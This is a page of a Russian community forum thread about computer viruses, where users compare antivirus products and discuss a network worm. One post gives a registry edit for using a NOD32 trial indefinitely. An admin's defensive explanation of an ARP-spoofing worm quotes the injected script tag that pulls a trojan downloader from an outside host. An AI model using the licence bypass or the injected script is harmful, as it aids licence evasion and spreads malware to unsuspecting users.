Страница 19 из 25 ПерваяПервая ... 9151617181920212223 ... ПоследняяПоследняя
Показано с 181 по 190 из 241

Тема: Внимание! Вирусы!

  1. #181
    Новый Житель Аватар для Janna
    Регистрация
    20.09.2007
    Сообщений
    132

    По умолчанию Re: Внимание! Вирусы!

    Люди, подскажите какую лучше антивирусную программу поставить(был касперский)? Смогу ли установить сама?

  2. #182
    Просто обыватель. Аватар для Step
    Регистрация
    04.07.2004
    Адрес
    Жизнь.
    Возраст
    74
    Сообщений
    11,563

    По умолчанию Re: Внимание! Вирусы!

    NOD32, версия 2.7
    Богов много - Создатель ОДИН!!!
    М.Монтень. "Богат не тот, у кого много денег, а тот, кому хватает".
    Просто живу, в силу своих возможностей...

  3. #183
    Ѧ Аватар для DimmY
    Регистрация
    20.09.2004
    Сообщений
    5,351

    По умолчанию Re: Внимание! Вирусы!

    Цитата Сообщение от Step Посмотреть сообщение
    NOD32, версия 2.7
    Не хотелось бы устраивать очередную "холивор", просто к сведению. Именно NOD32 (и этой же версии) на одном из моих компьютеров регулярно пропускает троянов (при ежедневном обновлении баз!). Всё больше склоняюсь к возврату на Касперского.
    .

  4. #184
    Наблюдатель Аватар для Johnix
    Регистрация
    31.10.2006
    Адрес
    в квартире
    Сообщений
    584

    По умолчанию Re: Внимание! Вирусы!

    Как заставить NOD постоянно скачивать обновления без всяких паролей и прочей лабуды!!! (Испробованно мной - все превосходно работает)
    Собственно способ: поправьте в реестре HKEY_LOCAL_MACHINESOFTWAREEsetNodCurrentVersionInfoView_CLSID забитое там значение на 0. После всех манипуляций вы сможете использовать вашу триальную копию несколько миллионов дней (что-то около 46000 лет)! Кстати, при этом она будет легко обновляться по официальному адресу http://www.nod32.com/nod_eval/

    P.S. Если кто не знает как войти в реест: Выберите в меню Пуск пункт Выполнить, введите в поле Открыть команду regedit и нажмите кнопку ОК.
    «Не так ты, Смерть, всесильна и ужасна, Как в страхе, о тебе идет молва…»
    Мой музыкальный профиль на last.fm

  5. #185
    Новый Житель Аватар для Pluton5791
    Регистрация
    28.12.2005
    Сообщений
    103

    По умолчанию Re: Внимание! Вирусы!

    Каспер стоит с 2005 года (на домашнем),и не разу не подводил.Обновление стоит каждые 3 часа.Насчет НОДА ничего не скажу(не пользовался),а АВАСТ ещё то ... пропускает много

  6. #186
    Motakuji Аватар для Reckless
    Регистрация
    26.01.2005
    Возраст
    37
    Сообщений
    2,822

    По умолчанию Re: Внимание! Вирусы!

    Цитата Сообщение от DimmY Посмотреть сообщение
    Не хотелось бы устраивать очередную "холивор", просто к сведению. Именно NOD32 (и этой же версии) на одном из моих компьютеров регулярно пропускает троянов (при ежедневном обновлении баз!). Всё больше склоняюсь к возврату на Касперского.
    Да... И как я уже писал и ты был этому свидетелем, идеальных антивирусов нет, во всех имеются какие то дырки... Лучше всего установить 2 неконфликтующих между собой антивируса, ибо дырки у них как бы это странно не звучало, разные.. То есть говоря простым языком, один будет прикрывать другой...
    З.Ы. Только не делайте одним из двух каспера, ору от него будет... Связка аваст + нод (оба фриварных) сбою не даёт...
    Даже после последних сообщений на сайте сети усомнился и проверил доктором вебом, но нет, всё чисто.
    З.Ы.Ы. На слабых машинах тоже не рекомендую...

  7. #187
    Горожанин Аватар для LeLiK
    Регистрация
    14.10.2004
    Возраст
    41
    Сообщений
    387

    По умолчанию Re: Внимание! Вирусы!

    Цитата Сообщение от Pluton5791 Посмотреть сообщение
    Каспер стоит с 2005 года (на домашнем),и не разу не подводил.Обновление стоит каждые 3 часа.Насчет НОДА ничего не скажу(не пользовался),а АВАСТ ещё то ... пропускает много
    Я на Avaste и Outpost Firewall четыре года сижу машина чиста! Проверено Касперским!

  8. #188
    ADmin
    Регистрация
    05.07.2000
    Адрес
    Там...
    Сообщений
    440

    По умолчанию Re: Внимание! Вирусы!

    Цитата Сообщение от Нютик Посмотреть сообщение
    А у меня вообще какая-то фигня была... Я заходила в инет, допустим на рамблер, а он мне пишет, что обнаружен вирус (чаще ЧЕРВЬ). НО! Обнаружен он на сайте, где я отродясь не была! Как-то www.k[далее какиет-то цифорки].com Я выхожу, табличка пропадает. ........ Что это значит?
    вот здесь именно про это и написано: http://new.solnet.ru/content/view/238/4/

    а именно:
    Технически это выглядит так: вирус, рассылая ARP пакеты, подменяет собой шлюз и начинает работать как прокси между клиентом и настоящим шлюзом, при этом добавляя в проходящий через него HTTP трафик JavaScript-код <script LANGUAGE="javascript1.2" src="хттп://g.asdafdgfgf.com/ads.js"></SCRIPT> для загрузки трояна, предположительно он также может собирать пароли из идущего "мимо" трафика. Может иметь массу разновидностей. Антивирус ругается на запись " обнаружено: троянская программа Trojan-Downloader.JS.FYM.a URL: хттп://x.222360.com/un.js"
    и если антивирус ругается, значит у Вас все в порядке, антивирус про данного червя знает и не пропустит.

    Сейчас мы ищем возможность огородить "чистых" пользователей сети от уже зараженных машин, но на данный момент общего решения нет, единственный пока способ оградиться от этого червя - это добавить статическую ARP запись на шлюз на каждом компьютере пользователя, но как вы понимаете всем это сделать не возможно.

  9. #189
    Старожил Аватар для Tommy
    Регистрация
    20.06.2005
    Сообщений
    2,025

    По умолчанию Re: Внимание! Вирусы!

    Нашёл тут интересную програмку, кто что скажет?

    Описание:
    Клон фантастической Машины Времени, - RollBack Rx, чьи технологии, доселе недоступные, открывают уже сегодня пользователю возможность реально отказаться от антивирусов, фаерволов и других систем защиты системы компьютера, как будто и не было вирусных и хакерских атак, неправильных и разрушающих действий установленных программ, роковых ошибок самого пользователя или полного краха системы. Итак, никакой головной боли! - EAZ-FIX Professional делая, за 5 сек, снимки системы, позволяет возвращать обратно ее назад, всего за 10 сек, всю, целиком 100%, включая пользовательские данные и настройки, на часы, недели и даже месяцы, даже в том случае, когда сама Windows уже не загружается. Есть возможность извлекать из этих моментальных снимков нужные или забытые файлы. Предотвращает доступ к компьютеру, если он украден. Перемещает, если необходимо систему с настройками и неповрежденными файлами на новый компьютер и пр.

    Спектр применения программы весьма широк: домашний пользователь, беспокоящийся о деструктивных действиях вирусов и домочадцев, Системщики, которые обязаны постоянно поддерживать компьютеры в рабочем состоянии; Центры тестинга софта, которые нуждаются в частой переустановке программ; Компьютерные Лаборатории, которые всегда должны иметь чистые системы и т д.. EAZ-FIX Professional является на сегодняшний день, самым легким, простым и быстрым продуктом на рынке, для возвращения ситуации назад, в исправное состояние, выбравших его для себя, более чем 1 250 000 пользователями по всему миру.

  10. #190
    Ѧ Аватар для DimmY
    Регистрация
    20.09.2004
    Сообщений
    5,351

    По умолчанию Re: Внимание! Вирусы!

    Цитата Сообщение от Tommy Посмотреть сообщение
    делая, за 5 сек, снимки системы, позволяет возвращать обратно ее назад, всего за 10 сек, всю, целиком 100%
    Это каким же образом?
    .

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

Похожие темы

  1. Внимание! Внимание! Солнечногорск! 2 июля состоится празднование Дня Молодежи!
    от Информатор в разделе Солнечногорск в сети Интернет
    Ответов: 0
    Последнее сообщение: 21.06.2016, 16:00
  2. одолели вирусы! Help!!!
    от Катрина в разделе Программное обеспечение
    Ответов: 18
    Последнее сообщение: 24.11.2007, 18:36
  3. Кому нужны вирусы?
    от Lada в разделе Компьютеры и периферия
    Ответов: 2
    Последнее сообщение: 27.10.2006, 12:59
  4. Мобильные Вирусы!
    от Expert в разделе Мобильная связь, смартфоны и гаджеты
    Ответов: 2
    Последнее сообщение: 02.03.2006, 00:19
  5. Алярма вирусы!
    от Vodorod в разделе Интернет, ТВ и провайдеры
    Ответов: 1
    Последнее сообщение: 11.08.2004, 14:36

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Top.Mail.Ru